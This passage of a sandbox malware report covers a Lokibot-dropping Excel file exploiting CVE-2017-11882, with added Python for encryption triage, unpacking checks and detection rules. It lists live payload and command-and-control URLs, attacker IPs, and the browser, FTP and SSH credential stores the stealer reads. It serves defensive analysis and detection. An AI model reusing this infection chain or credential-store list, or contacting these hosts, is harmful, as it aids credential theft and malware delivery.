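EncryptionInfo stream starts with a 2-byte major and 2-byte minor
version, and EncryptedPackage starts with an 8-byte plaintext size
followed by the ciphertext.
"""
import math
import random
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform byte mix."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def encryption_flavour(encryption_info: bytes) -> str:
    """Classify EncryptionInfo by its version header.

    major/minor 4/4 = Agile (XML descriptor, AES + SHA);
    3/2 or 4/2 = Standard (CryptoAPI RC4 or AES);
    3/3 or 4/3 = Extensible.  Anything else is unknown.
    """
    if len(encryption_info) < 4:
        return "unknown"
    major, minor = struct.unpack("<HH", encryption_info[:4])
    if (major, minor) == (4, 4):
        return "agile"
    if major in (3, 4) and minor == 2:
        return "standard"
    if major in (3, 4) and minor == 3:
        return "extensible"
    return "unknown"


def triage(streams: dict) -> dict:
    """Reproduce the 'OLE indicators encrypted' and entropy checks."""
    verdict = {"encrypted": False, "flavour": None,
               "package_entropy": None, "hint": None}
    if "EncryptionInfo" not in streams or "EncryptedPackage" not in streams:
        return verdict
    verdict["encrypted"] = True
    verdict["flavour"] = encryption_flavour(streams["EncryptionInfo"])
    # Skip the 8-byte plaintext-size prefix so only ciphertext is measured.
    ciphertext = streams["EncryptedPackage"][8:]
    verdict["package_entropy"] = round(shannon_entropy(ciphertext), 4)
    if verdict["package_entropy"] > 7.9:
        verdict["hint"] = ("ciphertext-like payload; try Excel's built-in "
                           "default password 'VelvetSweatshop' first")
    return verdict


def constructed_sample() -> dict:
    """Constructed stand-in for the sample's streams (not the real file):
    a Standard-encryption version header plus 64 KiB of seeded
    pseudo-random bytes standing in for AES ciphertext."""
    rng = random.Random(353332)  # seeded so the result is repeatable
    ciphertext = bytes(rng.getrandbits(8) for _ in range(65536))
    return {
        "EncryptionInfo": struct.pack("<HH", 4, 2) + b"\x24\x00\x00\x00",
        "EncryptedPackage": struct.pack("<Q", 60000) + ciphertext,
    }


if __name__ == "__main__":
    print(triage(constructed_sample()))
```

When the triage says encrypted, decrypt before any static analysis, for example with msoffcrypto-tool (`msoffcrypto-tool -p VelvetSweatshop "MV FORTUNE TRADER.xlsx" decrypted.xlsx`), then unzip the result and pull the embedded equation object out with oletools (oleobj). Only then do the usual OOXML scanners see the CVE-2017-11882 payload.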

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe | Unpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe | Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Yara detected aPLib compressed binary
Source: Yara match | File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match | File source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402AC0 push eax; ret (2 entries)
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00222D10 push eax; ret (2 entries)
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0525BD22 push es; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0525E027 push ebp; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0525B463 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0525EA1F push edi; retf
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0525EE79 push E83768D8h; retf
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (2 entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
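The "changes PE section rights" line above compares two section layouts of vbc.exe in a compact notation: ';'-separated name:rights pairs with R (read), W (write) and E (execute). One layout has .text/.rdata/.data/.rsrc, the other replaces .rsrc with a writable section named .x, the kind of private data section a packer stub uses to hold its compressed payload; the aPLib Yara hits in this section fit that, and the http://www.ibsensoftware.com/ string listed later under "URLs from Memory and Binaries" is the aPLib copyright string. The Python below is an added example, not Joe Sandbox code; it parses that notation and reports what differs between the two layouts. The argument order follows the report line (dumped image first, file on disk second); that assignment is an assumption, swap the arguments if your tooling prints the reverse.

```python
"""Diff two PE section-rights summaries in the report's notation.

Added example, not Joe Sandbox code. Notation: ';'-separated
'name:rights' entries, rights drawn from R (read), W (write),
E (execute), e.g. '.text:ER;.rdata:R;.data:W;.rsrc:R;'.
"""


def parse_sections(summary: str) -> dict:
    """'.text:ER;.rdata:R;' -> {'.text': {'E', 'R'}, '.rdata': {'R'}}."""
    sections = {}
    for entry in summary.split(";"):
        entry = entry.strip()
        if not entry:
            continue
        name, sep, rights = entry.rpartition(":")
        if not sep or not name or not set(rights) <= set("RWE"):
            raise ValueError(f"malformed section entry: {entry!r}")
        sections[name] = set(rights)
    return sections


def _fmt(rights: set) -> str:
    """Render a rights set in the report's letter order (ER, R, W, ...)."""
    return "".join(r for r in "ERW" if r in rights) or "-"


def diff_sections(dumped: str, on_disk: str) -> list:
    """Findings that explain a 'changes PE section rights' verdict.

    dumped  = layout of the image dumped from memory (first in the report line)
    on_disk = layout of the file as written to disk (second); this
              assignment follows the report's order and is an assumption.
    """
    mem, disk = parse_sections(dumped), parse_sections(on_disk)
    findings = []
    for name in sorted(disk.keys() - mem.keys()):
        findings.append(f"{name} ({_fmt(disk[name])}) exists on disk only")
    for name in sorted(mem.keys() - disk.keys()):
        findings.append(f"{name} ({_fmt(mem[name])}) exists in memory only")
    for name in sorted(mem.keys() & disk.keys()):
        if mem[name] != disk[name]:
            findings.append(f"{name} rights changed {_fmt(disk[name])} -> {_fmt(mem[name])}")
    # Writable+executable memory is where unpacked code gets written and then run.
    for name, rights in sorted(mem.items()):
        if {"W", "E"} <= rights:
            findings.append(f"{name} is writable and executable in memory")
    return findings


def is_unpacked(dumped: str, on_disk: str) -> bool:
    """True when the in-memory layout no longer matches the file on disk."""
    return bool(diff_sections(dumped, on_disk))


if __name__ == "__main__":
    # The two layouts from the report line for 4.2.vbc.exe.400000.1.unpack.
    for line in diff_sections(".text:ER;.rdata:R;.data:W;.rsrc:R;",
                              ".text:ER;.rdata:R;.data:W;.x:W;"):
        print(line)
```

A section that exists only in memory, or only on disk, is a stronger unpacking signal than a rights change alone: a legitimate loader never adds or drops sections, while a self-extracting stub routinely maps a new image over its own one (which is also what the "overwrites its own PE header" line records).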

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Users\Public\vbc.exe | Process information set: NOGPFAULTERRORBOX (117 identical entries)
Source: MV FORTUNE TRADER.xlsx | Stream path 'EncryptedPackage' entropy: 7.99992623739 (max. 8.0)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 948 | Thread sleep time: -420000s >= -30000s
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403D74 FindFirstFileW,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002233CB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_052593E3 push dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406069 GetUserNameW,
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Yara detected Lokibot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\Public\vbc.exe | Code function: HeapCreate, PopPassword
Source: C:\Users\Public\vbc.exe | Code function: HeapCreate, SmtpPassword
Source: Yara match | File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
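The process-creation, file-drop, credential-store and URL lines spread through this report describe one chain: EQNEDT32.EXE fetches regasm.exe (the regasm[1].exe copy under Content.IE5 is WinINet's cache naming, so the download went through the WinINet stack), writes it to C:\Users\Public\vbc.exe and starts it; vbc.exe then sweeps the Firefox, Chrome, WinSCP (HKEY_CURRENT_USER\Software\Martin Prikryl), KiTTY and FTP-client stores listed above and talks to panel URLs ending in /fre.php. Two details matter for detection. First, EQNEDT32.EXE is COM-activated: the report shows it created with "-Embedding" by an unknown parent, and in Sysmon data that parent is the DcomLaunch svchost, not EXCEL.EXE, so a rule keyed on Excel as parent misses it; key on the equation editor's own image name instead. Second, a single credential-store read can be the legitimate client, so count distinct stores per process before alerting. The Python below is an added example, not Joe Sandbox's or Sigma's rule code, that encodes those rules and runs them over constructed events mirroring the report; the event schema, field names, PIDs and the svchost parent are assumed for the illustration, while paths and URLs are the report's own. Map the schema onto your telemetry before use.

```python
"""Detection rules over constructed endpoint telemetry that mirrors the
chain in this report: EQNEDT32.EXE downloads regasm.exe, writes it to
C:\\Users\\Public\\vbc.exe and starts it; vbc.exe then reads browser,
FTP-client and SSH-client credential stores and posts to a /fre.php URL.

Added example, not Joe Sandbox or Sigma rule code. The event schema
(type / pid / image / parent_image / target / url) and SAMPLE_EVENTS are
assumed for this illustration; paths and URLs are the report's.
"""
import fnmatch
import re
from collections import defaultdict

EQUATION_EDITOR = "eqnedt32.exe"
SUSPICIOUS_EXEC_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")
# Stores this sample touched, as fnmatch patterns over lower-cased paths.
CREDENTIAL_STORES = (
    "*\\mozilla\\firefox\\profiles\\*\\key3.db",
    "*\\mozilla\\firefox\\profiles\\*\\cert8.db",
    "*\\google\\chrome\\user data\\*\\login data",
    "hkcu\\software\\martin prikryl*",           # WinSCP
    "hkcu\\software\\9bis.com\\kitty\\sessions*",
    "hkcu\\software\\far*\\plugins\\ftp\\hosts*",
    "hkcu\\software\\flashpeak\\blazeftp*",
    "hkcu\\software\\nch software\\classicftp*",
)
C2_PATH = re.compile(r"/fre\.php$", re.IGNORECASE)  # Lokibot panel path in the report


def _image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events) -> list:
    """Return (rule, pid, detail) tuples for every matching event.

    Rules key on EQNEDT32.EXE's own image name, never on EXCEL.EXE as
    parent: the report shows EQNEDT32.EXE started with '-Embedding' by an
    unknown parent, which is a COM activation, not a child of Excel.
    """
    hits = []
    stores_per_pid = defaultdict(set)
    for ev in events:
        actor = _image_name(ev.get("image", ""))
        if ev["type"] == "process_create":
            if _image_name(ev.get("parent_image", "")) == EQUATION_EDITOR:
                hits.append(("equation_editor_spawns_process", ev["pid"], ev["image"]))
            if any(d in ev["image"].lower() for d in SUSPICIOUS_EXEC_DIRS):
                hits.append(("execution_from_suspicious_folder", ev["pid"], ev["image"]))
        elif ev["type"] == "file_create":
            if actor == EQUATION_EDITOR and ev["target"].lower().endswith(".exe"):
                hits.append(("equation_editor_drops_pe", ev["pid"], ev["target"]))
        elif ev["type"] in ("file_read", "registry_open"):
            target = ev["target"].lower()
            for pattern in CREDENTIAL_STORES:
                if fnmatch.fnmatchcase(target, pattern):
                    stores_per_pid[ev["pid"]].add(pattern)
        elif ev["type"] == "network":
            if actor == EQUATION_EDITOR:
                hits.append(("equation_editor_network", ev["pid"], ev["url"]))
            if C2_PATH.search(ev["url"].split("?", 1)[0]):
                hits.append(("lokibot_panel_path", ev["pid"], ev["url"]))
    # One store could be the legitimate client reading its own config;
    # three or more unrelated stores from one process is the stealer pattern.
    for pid, stores in stores_per_pid.items():
        if len(stores) >= 3:
            hits.append(("credential_store_sweep", pid, f"{len(stores)} stores"))
    return hits


EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
SAMPLE_EVENTS = [  # constructed; PIDs and the svchost parent are assumed
    {"type": "process_create", "pid": 1100, "image": EQ,
     "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"type": "network", "pid": 1100, "image": EQ,
     "url": "http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe"},
    {"type": "file_create", "pid": 1100, "image": EQ, "target":
     r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe"},
    {"type": "file_create", "pid": 1100, "image": EQ, "target": VBC},
    {"type": "process_create", "pid": 1276, "image": VBC, "parent_image": EQ},
    {"type": "file_read", "pid": 1276, "image": VBC, "target":
     r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db"},
    {"type": "file_read", "pid": 1276, "image": VBC, "target":
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "registry_open", "pid": 1276, "image": VBC, "target": r"HKCU\Software\Martin Prikryl"},
    {"type": "registry_open", "pid": 1276, "image": VBC, "target": r"HKCU\Software\9bis.com\KiTTY\Sessions"},
    {"type": "network", "pid": 1276, "image": VBC, "url": "http://becharnise.ir/fa13/fre.php"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:34} pid={pid} {detail}")
```

The first process_create event (EQNEDT32.EXE under svchost.exe) produces no hit on purpose: the equation editor being started is normal for any document with an equation object, and the signal is what it does next (network access, dropping an .exe, spawning a child), which is also how the Sigma rules named in this report are scoped.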

Mitre Att&ck Matrix

Columns are ATT&CK tactics, rows are the techniques the report maps; digits in parentheses after a technique are the report's own per-technique signature markers, kept as printed, and an empty cell means no technique in that column for the row.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Exploitation for Client Execution (13) | Path Interception | Process Injection (12) | Disable or Modify Tools (1) | OS Credential Dumping (2) | Account Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (13) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information (1) | Credentials in Registry (2) | File and Directory Discovery (2) | Remote Desktop Protocol | Man in the Browser (1) | Exfiltration Over Bluetooth | Encrypted Channel (12) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (21) | Security Account Manager | System Information Discovery (13) | SMB/Windows Admin Shares | Data from Local System (2) | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (2) | NTDS | Query Registry (1) | Distributed Component Object Model | Email Collection (1) | Scheduled Transfer | Application Layer Protocol (124) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading (111) | LSA Secrets | Security Software Discovery (11) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (12) | DCSync | Process Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Owner/User Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe | 36% | ReversingLabs | Win32.Trojan.Generic
C:\Users\Public\vbc.exe | 36% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.vbc.exe.220e50.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.3.vbc.exe.240000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner
cutt.ly | 1% | Virustotal
becharnise.ir | 17% | Virustotal
stdyrusschinetwomast.dns.army | 1% | Virustotal

URLs

Source | Detection | Scanner | Label
http://www.%s.comPA | 0% | URL Reputation | safe
http://kbfvzoboss.bid/alien/fre.php | 14% | Virustotal |
http://kbfvzoboss.bid/alien/fre.php | 0% | Avira URL Cloud | safe
http://alphastand.win/alien/fre.php | 10% | Virustotal |
http://alphastand.win/alien/fre.php | 0% | Avira URL Cloud | safe
http://alphastand.trade/alien/fre.php | 11% | Virustotal |
http://alphastand.trade/alien/fre.php | 0% | Avira URL Cloud | safe
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe | 10% | Virustotal |
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe | 100% | Avira URL Cloud | malware
http://alphastand.top/alien/fre.php | 0% | Avira URL Cloud | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://becharnise.ir/fa13/fre.php | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cutt.ly
            172.67.8.238
            truefalseunknown
            becharnise.ir
            185.208.180.121
            truetrueunknown
            stdyrusschinetwomast.dns.army
            103.141.138.123
            truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://alphastand.win/alien/fre.phptrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://alphastand.trade/alien/fre.phptrue
            • 11%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://stdyrusschinetwomast.dns.army/receiprt/regasm.exetrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://alphastand.top/alien/fre.phptrue
            • Avira URL Cloud: safe
            unknown
            http://becharnise.ir/fa13/fre.phptrue
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

Name / Source / Malicious / Antivirus Detection / Reputation
Name: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp
Malicious: false, Reputation: low
• URL Reputation: safe
Name: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp
Malicious: false, Reputation: high
Name: http://www.day.com/dam/1.0
Source: 83553F27.emf.0.dr
Malicious: false, Reputation: high
Name: http://www.ibsensoftware.com/
Source: vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp
Malicious: false, Reputation: unknown
• URL Reputation: safe

                Contacted IPs


                Public

IP / Domain / Country / ASN / ASN Name / Malicious
IP: 172.67.8.238, Domain: unknown, Country: United States, ASN: 13335, ASN Name: CLOUDFLARENETUS, Malicious: false
IP: 103.141.138.123, Domain: unknown, Country: Viet Nam, ASN: 135905, ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Malicious: true
IP: 185.208.180.121, Domain: unknown, Country: Iran (ISLAMIC Republic Of), ASN: 48147, ASN Name: AMINIDCIR, Malicious: true

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:353332
                Start date:16.02.2021
                Start time:07:01:21
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 46s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:MV FORTUNE TRADER.xlsx
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 42.7% (good quality ratio 40.8%)
                • Quality average: 75.8%
                • Quality standard deviation: 29.4%
                HCA Information:Failed
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
Warnings:
                • Exclude process from analysis (whitelisted): dllhost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

Time / Type / Description
Time: 07:02:10, Type: API Interceptor, Description: 57x Sleep call for process: EQNEDT32.EXE modified
Time: 07:02:16, Type: API Interceptor, Description: 419x Sleep call for process: vbc.exe modified

                Joe Sandbox View / Context

                IPs

Match / Associated Sample Name / Detection / Context
Match: 172.67.8.238
• Inquiry Bulgaria.xls, Detection: malicious, Context: cutt.ly/AkBqUvK
• DHL-correction.xlsx, Detection: malicious, Context: cutt.ly/
Match: 103.141.138.123
• E68-STD-239-2020-239.xlsx, Detection: malicious, Context: stdyrusschinetwomast.dns.army/receiprt/regasm.exe
• ETD 4.2 INOVOICE, PACKING LIST.xlsx, Detection: malicious, Context: stdyrusschine2mastab.dns.army/documenst/regasm.exe
• INQ 20-26626-0222.xlsx, Detection: malicious, Context: stdyrusschine2mastab.dns.army/documenst/regasm.exe
• BSL 21 PYT.xlsx, Detection: malicious, Context: sndyrusschine2masnbc.dns.army/documernt/regasm.exe
• VM ASIAN CHAMPION.xlsx, Detection: malicious, Context: russchine2wsdymapaws.dns.navy/russdoc/regasm.exe
